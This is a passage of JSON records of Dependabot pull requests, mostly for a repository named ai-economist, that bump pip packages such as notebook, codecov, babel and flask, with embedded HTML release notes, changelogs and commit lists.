href=\"https://github.com/jupyter/notebook/blob/main/CHANGELOG.md\"\u003enotebook's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003cp\u003eA summary of changes in the Jupyter notebook. For more detailed\ninformation, see \u003ca href=\"https://github.com/jupyter/notebook\"\u003eGitHub\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eUse \u003ccode\u003epip install notebook --upgrade\u003c/code\u003e or \u003ccode\u003econda upgrade notebook\u003c/code\u003e to\nupgrade to the latest release.\u003c/p\u003e\n\u003cp\u003eWe strongly recommend that you upgrade pip to version 9+ of pip before\nupgrading \u003ccode\u003enotebook\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eUse \u003ccode\u003epip install pip --upgrade\u003c/code\u003e to upgrade pip. Check pip version with\n\u003ccode\u003epip --version\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003e7.4\u003c/h2\u003e\n\u003cp\u003eJupyter Notebook 7.4 is based on JupyterLab 4.4, and includes a number of new features, bug fixes, and enhancements for extension developers. This release is compatible with extensions supporting JupyterLab 4.0. Extension authors are recommended to consult the \u003ca href=\"https://jupyterlab.readthedocs.io/en/latest/extension/extension_migration.html#jupyterlab-4-3-to-4-4\"\u003eExtension Migration Guide\u003c/a\u003e which lists deprecations and changes to the public API.\u003c/p\u003e\n\u003cp\u003eBelow are a few highlights for this new release. Most of the new features and improvements come from the update to JupyterLab 4.4, although they may not all be supported in Notebook 7.4.\u003c/p\u003e\n\u003cp\u003eFor reference you may have a look at the \u003ca href=\"https://jupyterlab.readthedocs.io/en/latest/getting_started/changelog.html#v4-4\"\u003eJupyterLab 4.4 changelog\u003c/a\u003e to learn more.\u003c/p\u003e\n\u003ch3\u003eCode console improvements\u003c/h3\u003e\n\u003cp\u003eThe code console prompt can now be positioned on the top, left, or right side of the console,\nin addition to the default bottom placement. The placement is persisted in the Prompt Cell\nPosition setting.\u003c/p\u003e\n\u003cp\u003eThe console toolbar now includes buttons to:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eExecute code\u003c/li\u003e\n\u003cli\u003eRestart the kernel\u003c/li\u003e\n\u003cli\u003eClear the cells\u003c/li\u003e\n\u003cli\u003eSwitch the kernel\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eAdditional settings for console behavior have been added:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eClear Code Content on Execute (enabled by default) – When disabled, the code submitted for execution remains in the code editor, allowing for further edits.\u003c/li\u003e\n\u003cli\u003eHide Code Input – When enabled, only the execution output is shown in the console.\u003c/li\u003e\n\u003cli\u003eClear Cells on Execute – When enabled, only the last cell is displayed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eToggling all the three new settings transforms the console into an interactive editor\nresembling an ephemeral notebook with a single cell.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch3\u003eSettings import and export\u003c/h3\u003e\n\u003cp\u003eSettings can now be exported to \u003ccode\u003eoverrides.json\u003c/code\u003e from the Settings Editor,\nwhich can be used to pre-configure defaults in deployments or to restore settings.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/aee45355b568650cf650f4e2d3d551570655f844\"\u003e\u003ccode\u003eaee4535\u003c/code\u003e\u003c/a\u003e Release 6.4.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/a161ffac6bfff2491fe5c4e9f6111256b8b57f08\"\u003e\u003ccode\u003ea161ffa\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-v7vq-3x77-87vg\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/b79702ccdbc40a1fda5a87a3f73854e8267529e6\"\u003e\u003ccode\u003eb79702c\u003c/code\u003e\u003c/a\u003e updated error messages to not mention hidden files\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/cb3dc22f0f152c1dcbcdb1aa3514748758f432a8\"\u003e\u003ccode\u003ecb3dc22\u003c/code\u003e\u003c/a\u003e Update notebook/services/contents/filemanager.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/1c3d7a60cd16deddba5b1344f5c94f967ba682d8\"\u003e\u003ccode\u003e1c3d7a6\u003c/code\u003e\u003c/a\u003e added hidden checks on handlers.py and accompanying tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/f69eb96cff7149b38bca068f4b7faaa7baf55902\"\u003e\u003ccode\u003ef69eb96\u003c/code\u003e\u003c/a\u003e added hidden checks on FileContentsManager and accompanying tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/2a76184f46ed6a...\n\n_Description has been truncated_","html_url":"https://github.com/abhinavm24/ai-economist/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/abhinavm24%2Fai-economist/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"},{"uuid":"3347073594","node_id":"PR_kwDOAT3lsM6k-MTb","number":2,"state":"open","title":"Bump the pip group across 1 directory with 11 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-08-22T23:31:26.000Z","updated_at":"2025-08-22T23:31:34.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":11,"packages":[{"name":"codecov","old_version":"2.0.15","new_version":"2.1.13","repository_url":"https://github.com/codecov/codecov-python"},{"name":"babel","old_version":"2.5.3","new_version":"2.9.1","repository_url":"https://github.com/python-babel/babel"},{"name":"bleach","old_version":"2.1.3","new_version":"3.3.0","repository_url":"https://github.com/mozilla/bleach"},{"name":"eventlet","old_version":"0.23.0","new_version":"0.35.2","repository_url":"https://github.com/eventlet/eventlet"},{"name":"flask","old_version":"1.0.2","new_version":"2.2.5","repository_url":"https://github.com/pallets/flask"},{"name":"future","old_version":"0.16.0","new_version":"1.0.0","repository_url":"https://github.com/PythonCharmers/python-future"},{"name":"py","old_version":"1.5.3","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"virtualenv","old_version":"15.2.0","new_version":"20.26.6","repository_url":"https://github.com/pypa/virtualenv"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 8 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [codecov](https://github.com/codecov/codecov-python) | `2.0.15` | `2.1.13` |\n| [babel](https://github.com/python-babel/babel) | `2.5.3` | `2.9.1` |\n| [bleach](https://github.com/mozilla/bleach) | `2.1.3` | `3.3.0` |\n| [eventlet](https://github.com/eventlet/eventlet) | `0.23.0` | `0.35.2` |\n| [flask](https://github.com/pallets/flask) | `1.0.2` | `2.2.5` |\n| [future](https://github.com/PythonCharmers/python-future) | `0.16.0` | `1.0.0` |\n| [py](https://github.com/pytest-dev/py) | `1.5.3` | `1.11.0` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `15.2.0` | `20.26.6` |\n\n\nUpdates `codecov` from 2.0.15 to 2.1.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/codecov/codecov-python/releases\"\u003ecodecov's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.1.13\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd deprecation notice by \u003ca href=\"https://github.com/thomasrockhu-codecov\"\u003e\u003ccode\u003e@​thomasrockhu-codecov\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/325\"\u003ecodecov/codecov-python#325\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd migration guide link by \u003ca href=\"https://github.com/thomasrockhu-codecov\"\u003e\u003ccode\u003e@​thomasrockhu-codecov\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/327\"\u003ecodecov/codecov-python#327\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/codecov/codecov-python/compare/v2.1.12...v2.1.13\"\u003ehttps://github.com/codecov/codecov-python/compare/v2.1.12...v2.1.13\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.1.12\u003c/h2\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.12\u003c/code\u003e\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/322\"\u003e#322\u003c/a\u003e Add Cirrus CI\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies and Misc\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/311\"\u003e#311\u003c/a\u003e Bump coverage from 5.3 to 5.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/312\"\u003e#312\u003c/a\u003e Bump coverage from 5.3.1 to 5.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/314\"\u003e#314\u003c/a\u003e Bump coverage from 5.4 to 5.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/320\"\u003e#320\u003c/a\u003e Upgrade to GitHub-native Dependabot\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.1.11\u003c/h2\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.11\u003c/code\u003e\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/305\"\u003e#305\u003c/a\u003e Added option to disable printing of gcov-out\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/308\"\u003e#308\u003c/a\u003e Handle exceptions that don't have a returncode\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies and Misc\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/301\"\u003e#301\u003c/a\u003e Update to Python 3.9\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.1.10\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/148\"\u003e#148\u003c/a\u003e Output elapsed time with S3 upload\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/153\"\u003e#153\u003c/a\u003e Improve error reporting in the \u0026quot;try_run\u0026quot; function and correctly include original command output in the error message\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/295\"\u003e#295\u003c/a\u003e Added sleep between upload retries.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/297\"\u003e#297\u003c/a\u003e Ignore emacs lisp files\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/298\"\u003e#298\u003c/a\u003e Fix error try_to_run using | without shell=True (fix \u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/284\"\u003e#284\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDependencies and Misc\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/290\"\u003e#290\u003c/a\u003e Bump coverage from 4.5.4 to 5.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/291\"\u003e#291\u003c/a\u003e Update python versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/292\"\u003e#292\u003c/a\u003e Add license scan report and status\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/294\"\u003e#294\u003c/a\u003e Update README with accurate links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/296\"\u003e#296\u003c/a\u003e Bump coverage from 5.2.1 to 5.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.1.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/289\"\u003e#289\u003c/a\u003e Remove token restrictions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.8\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/codecov/codecov-python/blob/master/CHANGELOG.md\"\u003ecodecov's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.12\u003c/code\u003e\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/322\"\u003e#322\u003c/a\u003e Add Cirrus CI\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies and Misc\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/311\"\u003e#311\u003c/a\u003e Bump coverage from 5.3 to 5.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/312\"\u003e#312\u003c/a\u003e Bump coverage from 5.3.1 to 5.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/314\"\u003e#314\u003c/a\u003e Bump coverage from 5.4 to 5.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/320\"\u003e#320\u003c/a\u003e Upgrade to GitHub-native Dependabot\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.11\u003c/code\u003e\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/305\"\u003e#305\u003c/a\u003e Added option to disable printing of gcov-out\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/308\"\u003e#308\u003c/a\u003e Handle exceptions that don't have a returncode\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies and Misc\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/301\"\u003e#301\u003c/a\u003e Update to Python 3.9\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.10\u003c/code\u003e\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/148\"\u003e#148\u003c/a\u003e Output elapsed time with S3 upload\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/153\"\u003e#153\u003c/a\u003e Improve error reporting in the \u0026quot;try_run\u0026quot; function and correctly include original command output in the error message\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/295\"\u003e#295\u003c/a\u003e Added sleep between upload retries.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/297\"\u003e#297\u003c/a\u003e Ignore emacs lisp files\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/298\"\u003e#298\u003c/a\u003e Fix error try_to_run using | without shell=True (fix \u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/284\"\u003e#284\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies and Misc\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/290\"\u003e#290\u003c/a\u003e Bump coverage from 4.5.4 to 5.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/291\"\u003e#291\u003c/a\u003e Update python versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/292\"\u003e#292\u003c/a\u003e Add license scan report and status\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/294\"\u003e#294\u003c/a\u003e Update README with accurate links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/296\"\u003e#296\u003c/a\u003e Bump coverage from 5.2.1 to 5.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.9\u003c/code\u003e\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/289\"\u003e#289\u003c/a\u003eRemove token restriction as it is changed server-side\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.8\u003c/code\u003e\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/285\"\u003e#285\u003c/a\u003eAdd support for CODECOV_FLAGS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/276\"\u003e#276\u003c/a\u003eAdd ability to specify number of upload retries\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.7\u003c/code\u003e\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/279\"\u003e#279\u003c/a\u003e Fix pinned coverage version\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.6\u003c/code\u003e\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/a78512e4b00e67cfb3fccb530c9ca97a6c42eae5\"\u003e\u003ccode\u003ea78512e\u003c/code\u003e\u003c/a\u003e chore(release): bump to 3.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/37663707961db1092134500fe19638a5c08c52c2\"\u003e\u003ccode\u003e3766370\u003c/code\u003e\u003c/a\u003e Update README.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/12c0dddd6350a1d511f22d363e89d9019b149164\"\u003e\u003ccode\u003e12c0ddd\u003c/code\u003e\u003c/a\u003e Add migration guide link (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/327\"\u003e#327\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/46e1b8c69923a8c6a94c8de4ec1c950c7c6cc1e8\"\u003e\u003ccode\u003e46e1b8c\u003c/code\u003e\u003c/a\u003e Add deprecation notice (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/325\"\u003e#325\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/fcff43933beb9f242e6ef0eb4c70670f4543e289\"\u003e\u003ccode\u003efcff439\u003c/code\u003e\u003c/a\u003e chore: bump to 2.1.12 (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/323\"\u003e#323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/27a9833441ab179118716b86026e526919b2a0db\"\u003e\u003ccode\u003e27a9833\u003c/code\u003e\u003c/a\u003e Add Cirrus CI (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/322\"\u003e#322\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/51469b065f0e16d4bedf121552b5e1eb58e18125\"\u003e\u003ccode\u003e51469b0\u003c/code\u003e\u003c/a\u003e Upgrade to GitHub-native Dependabot (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/320\"\u003e#320\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/158a38eed7fd6f0d2f9c9f4c5258ab1f244b6e13\"\u003e\u003ccode\u003e158a38e\u003c/code\u003e\u003c/a\u003e Bump coverage from 5.4 to 5.5 (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/314\"\u003e#314\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/26fe18b0e7019e3415f1df525fbe4dfb72057714\"\u003e\u003ccode\u003e26fe18b\u003c/code\u003e\u003c/a\u003e Bump coverage from 5.3.1 to 5.4 (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/312\"\u003e#312\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/147802d7403db0c21b81820ba9a8619b8d398b2b\"\u003e\u003ccode\u003e147802d\u003c/code\u003e\u003c/a\u003e Bump coverage from 5.3 to 5.3.1 (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/311\"\u003e#311\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/codecov/codecov-python/compare/v2.0.15...v2.1.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `babel` from 2.5.3 to 2.9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/releases\"\u003ebabel's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThe internal locale-data loading functions now validate the name of the locale file to be loaded and only allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003ch1\u003eUpcoming version support changes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Use CLDR 37 – Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/734\"\u003e#734\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNumbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/726\"\u003e#726\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eImport: Simplify iteration code in \u0026quot;import_cldr.py\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eImport: Stop using deprecated ElementTree methods \u0026quot;getchildren()\u0026quot; and \u0026quot;getiterator()\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eMessages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eMessages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eTests: fix tests when using Python 3.9 – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eTests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\u003c/li\u003e\n\u003cli\u003eTests: Support Py.test 6.x – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eUtilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/724\"\u003e#724\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUtilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocumentation\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate parse_number comments – Brad Martin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/708\"\u003e#708\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd \u003cstrong\u003eiter\u003c/strong\u003e to Catalog documentation – \u003ca href=\"https://github.com/CyanNani123\"\u003e\u003ccode\u003e@​CyanNani123\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.8.1\u003c/h2\u003e\n\u003cp\u003eThis patch version only differs from 2.8.0 in that it backports in \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/752\"\u003e#752\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003eVersion 2.8.0\u003c/h2\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Upgrade to CLDR 36.0 - Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/679\"\u003e#679\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMessages: Don't even open files with the \u0026quot;ignore\u0026quot; extraction method - \u003ca href=\"https://github.com/sebleblanc\"\u003e\u003ccode\u003e@​sebleblanc\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eNumbers: Fix formatting very small decimals when quantization is disabled - Lev Lybin, \u003ca href=\"https://github.com/miluChen\"\u003e\u003ccode\u003e@​miluChen\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/662\"\u003e#662\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMessages: Attempt to sort all messages – Mario Frasca (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/651\"\u003e#651\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/606\"\u003e#606\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocs\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/blob/master/CHANGES.rst\"\u003ebabel's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* The internal locale-data loading functions now validate the name of the locale file to be loaded and only\n  allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003cp\u003eUpcoming version support changes\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 